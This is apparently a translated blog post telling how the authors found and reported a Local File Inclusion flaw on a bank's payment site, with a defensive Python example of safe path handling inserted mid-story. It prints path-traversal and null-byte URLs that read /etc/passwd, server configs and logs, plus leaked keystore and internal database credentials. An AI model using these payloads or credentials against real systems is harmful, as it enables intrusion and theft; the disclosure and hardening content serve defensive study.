11:53 The Story of a Penetration
The recent threads about catching hackers prompted me to write this post. I'd like to share a story that happened to me and a friend a few years ago. My hobby is the security of web applications. While randomly browsing the internet, my friend found a site that sends free SMS to Ukrainian mobile operators. There we found a small vulnerability related to bypassing the Turing test (the captcha). Since my friend and I love hunting for vulnerabilities, we made a game of it: who could bypass the captcha faster. But today's story is not about that; it is about what we discovered next. One day my friend, looking through the page source of the free-SMS site, found an interesting piece of HTML:

<A HREF="#" onClick="javascript:window.open('https://hackbank.ua/test.php?code=MOBILE&state=2&xslt_url=service_host.xsl', 'quickpay', 'toolbar=0,status=0,menubar=0,scrollbars=0,width=650,height=400', false);" CLASS="header"><IMG SRC="www.sms1.ua/img/topupeasy.jpg" WIDTH="82" HEIGHT="34" ALT="Recharge is easy!" BORDER="0" VSPACE="0"></A>

A link that, logically, should load a file onto the page was very interesting to us. Within 5 minutes we had discovered a Local File Inclusion vulnerability. It was in the following link:

https://hackbank.ua/test.php?code=MOBILE&state=2&xslt_url=<local_file>

With this vulnerability you can read local files directly in your browser. We made a request to the server for a nonexistent file, and this is what happened. Request URL:

https://hackbank.ua/test?&xslt_url=0

The server's reply was something like this:

500 Servlet Exception
...........................
Resin-3.0.s060216 (built Thu, 16 Feb 2006 09:17:50 PST)

Honestly, this was the first time I had heard of Resin. Resin is a high-performance application server with features such as scalability and load balancing.
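The bug above is the classic shape of an LFI: a request parameter is joined onto a directory and handed to the file system, so "../" walks out of the directory and a trailing %00 cuts off whatever suffix the application appends. The following Python is an added example, not code from the original post or from Resin; it models that vulnerable lookup next to a hardened version and runs both against constructed inputs in a throwaway directory. The directory layout, file names and the parameter values are assumptions made for the demo.

```python
"""Safe resolution of a user-controlled file parameter such as xslt_url.

Added example (not from the original post).  Models the server-side lookup
the story's endpoint must have done, and a hardened replacement.  Paths and
inputs below are constructed for the demo.
"""
import os
import tempfile
from urllib.parse import unquote

ALLOWED_SUFFIXES = (".xsl",)   # the endpoint only ever needs stylesheets


def resolve_unsafe(base_dir: str, user_value: str) -> str:
    """The vulnerable pattern: join the parameter onto a base directory.

    '../' sequences walk out of base_dir, and a NUL (%00) lets the caller
    truncate anything the application appends after the parameter."""
    return os.path.join(base_dir, unquote(user_value))


def resolve_safe(base_dir: str, user_value: str) -> str:
    """Hardened lookup: raises ValueError for anything that is not a
    stylesheet sitting directly inside base_dir."""
    decoded = unquote(user_value)
    # 1. NUL bytes never belong in a file name; runtimes of that era
    #    silently truncated at the first NUL, which is what %00 exploited.
    if "\x00" in decoded:
        raise ValueError("NUL byte in file name")
    # 2. Only a bare file name is acceptable: no separators, no '..'.
    if os.path.basename(decoded) != decoded or decoded in ("", ".", ".."):
        raise ValueError("path components are not allowed")
    # 3. Allowlist the extension instead of blocklisting bad paths.
    if not decoded.endswith(ALLOWED_SUFFIXES):
        raise ValueError("not a stylesheet")
    # 4. Canonicalise and prove containment; a symlink inside base_dir that
    #    points elsewhere is caught here.
    base_real = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base_real, decoded))
    if os.path.commonpath([base_real, candidate]) != base_real:
        raise ValueError("escapes base directory")
    return candidate


def demo() -> dict:
    """Build a constructed layout and run both resolvers on three inputs."""
    root = tempfile.mkdtemp()
    xsl_dir = os.path.join(root, "webapps", "ROOT", "xsl")   # assumed layout
    os.makedirs(xsl_dir)
    secret = os.path.join(root, "conf", "resin.conf")
    os.makedirs(os.path.dirname(secret))
    with open(secret, "w") as f:
        f.write("<resin/>")
    with open(os.path.join(xsl_dir, "service_host.xsl"), "w") as f:
        f.write("<xsl/>")

    inputs = {
        "legit": "service_host.xsl",
        "traversal": "../../../conf/resin.conf",
        "nul": "../../../conf/resin.conf%00.xsl",
    }
    results = {}
    for name, value in inputs.items():
        unsafe = resolve_unsafe(xsl_dir, value)
        # What a NUL-truncating runtime would actually open:
        opened = os.path.normpath(unsafe.split("\x00")[0])
        results[name + "_unsafe_reaches_conf"] = opened == os.path.normpath(secret)
        try:
            resolve_safe(xsl_dir, value)
            results[name + "_safe"] = "accepted"
        except ValueError as err:
            results[name + "_safe"] = str(err)
    return results


if __name__ == "__main__":
    for key, val in demo().items():
        print(f"{key}: {val}")
```

The order of the checks matters: the NUL and bare-name tests are cheap and reject the malformed input before it ever touches the file system, and the realpath containment check is the backstop for anything the string checks miss.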
Information about the product, which we found on Wikipedia at the time:

Developer: Caucho Technology, Inc.
Type: Application server
OS: Cross-platform
Current version: 3.1.1, May 2007
License: GPL / Proprietary
Website: www.caucho.com/ (English)

After downloading the software, we began to study it. Here is the folder structure of Resin:

|   configure
|   httpd.exe
|   LICENSE
|   Makefile.in
|   README
|   setup.exe
|
+---automake
|       config.guess
|       config.sub
|       install-sh
|       ltmain.sh
|       missing
|
+---bin
|       httpd.sh
|
+---conf
|       app-default.xml
|       development.conf
|       fine.conf
|       minimal.conf
|       password.xml
|       resin-3_1.conf
|       resin-admin.xml
|       resin.conf
|
+---contrib
|       init.resin-iptables
|       init.resin.in
|
+---lib
|       activation.jar
|       eclipse-compil

Now let's go back to the vulnerability. We start with the classics. For the link

https://hackbank.ua/test?xslt_url=../../../../../../etc/passwd

we got the following output:

root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
rpm:x:37:37::/var/lib/rpm:/sbin/nologin
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
ident:x:100:101::/home/ident:/sbin/nologin
netdump:x:34:34:Network Crash Dump user:/var/crash:/bin/bash
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
rpcuser:x:29:29:RPC Servic

Then we started looking for where the Resin server's /conf folder was stored locally, and found it pretty quickly. The configuration is an XML file, and it was available at the link

https://hackbank.ua/test?xslt_url=../../../../../../conf/resin.conf%00

%00 is a null byte; it tells the web server that this is the end of the string. Next, consider the source of the file we received:

<?xml version="1.0" encoding="utf-8"?>
<resin xmlns:resin="caucho.com/ns/resin/core" xmlns="caucho.com/ns/resin">
  <server>
    <http port="1080"/>
    <http port="10443">
      <jsse-ssl>
        <key-store-type>JKS</key-store-type>
        <key-store-file>keys/hackbank.jks</key-store-file>
        <password>fynbxfn</password>
        <key-manager-factory>6645b</key-manager-factory>
        <ssl-context>SSL</ssl-context>
      </jsse-ssl>
    </http>
    <host id="" root-directory=".">
      <access-log path="log/access.log" format='%h %l %u %t "%r" %s %b "%i" "%i"' rollover-period="1W"/>
      <stderr-log path="log/stderr.log" timestamp="[%Y.%m.%d %H:%M:%S.%s]" rollover-period="1W"/>
      <stdout-log path="log/stdout.log" rollover-period="1W"/>
      <log path="log/server.log" timestamp="[%Y.%m.%d %H:%M:%S.%s]" rollover-period="1W"/>
      <web-app id="/" document-directory="webapps/ROOT"/>
      <ear-deploy path="deploy">
        <ear-default>
          <ejb-server jndi-name="java:comp/env/ejb"/>
        </ear-default>
      </ear-deploy>
      <web-app-deploy path="webapps"/>
      <resource-deploy path="deploy"/>
      <web-app-deploy path="deploy"/>
    </host>
    <resin:import path="$/conf/db-pool.xml"/>
    <resin:import path="$/conf/c2b-db-pool.xml"/>
    <resin:import path="$/conf/db-pool-qp.xml"/>
    <resin:import path="$/conf/hb-default.xml"/>
    <resin:import path="$/conf/resin-status.xml"/>
  </server>
  <resin:import path="$/conf/resin-common.xml"/>
</resin>

All the web server logs were here:

https://hackbank.ua/test?xslt_url=../../../../../../log/access.log
https://hackbank.ua/test?xslt_url=../../../../../../log/stderr.log
https://hackbank.ua/test?xslt_url=../../../../../../log/server.log

We found nothing interesting in them.
But we went further :) The file ../../../../../../conf/c2b-db-pool.xml%00 contained:

10.1.101.195:5000 ----------------- user: C2BServer password: vsirfysy
10.1.100.105:5000 ----------------- user: C2BServer password: lfktrbq,thtu
10.1.100.115:5000 ----------------- user: jbkl password: 123456

The file ../../../../../../conf/db-pool.xml%00 contained:

10.1.101.51:5000 ------------------- user: e16_jag password: u4BKoc7U5Edo
10.1.100.77:5000 ------------------- user: hskl password: hsklhskl
10.1.99.49:4100 ------------------ user: wbpfo_p424 password: aUKlOfcvT4YmAnk
10.1.99.82:5000 ------------------ user: P24CVC password: Login_4_P424CVC

Guess what these are? That's right: credentials for other servers on the bank's internal network :)

The next day we wrote a letter describing all the vulnerabilities we had found and sent it to the bank's mailbox. After 3 weeks the vulnerabilities were still present. We sent another letter, and a week later, to our delight, the vulnerability was fixed.

With this article we do not want to offend anyone; we just want to convey to the world that there is no such thing as a secure system. Hire professionals to audit your information systems. If you have any questions: vadim@g-sg.net

* Warning! All links, as well as the bank's name, have been changed for reasons of anonymity. *

Thank you for your attention!

UPD. Please report any errors in the text by private message. Thank you!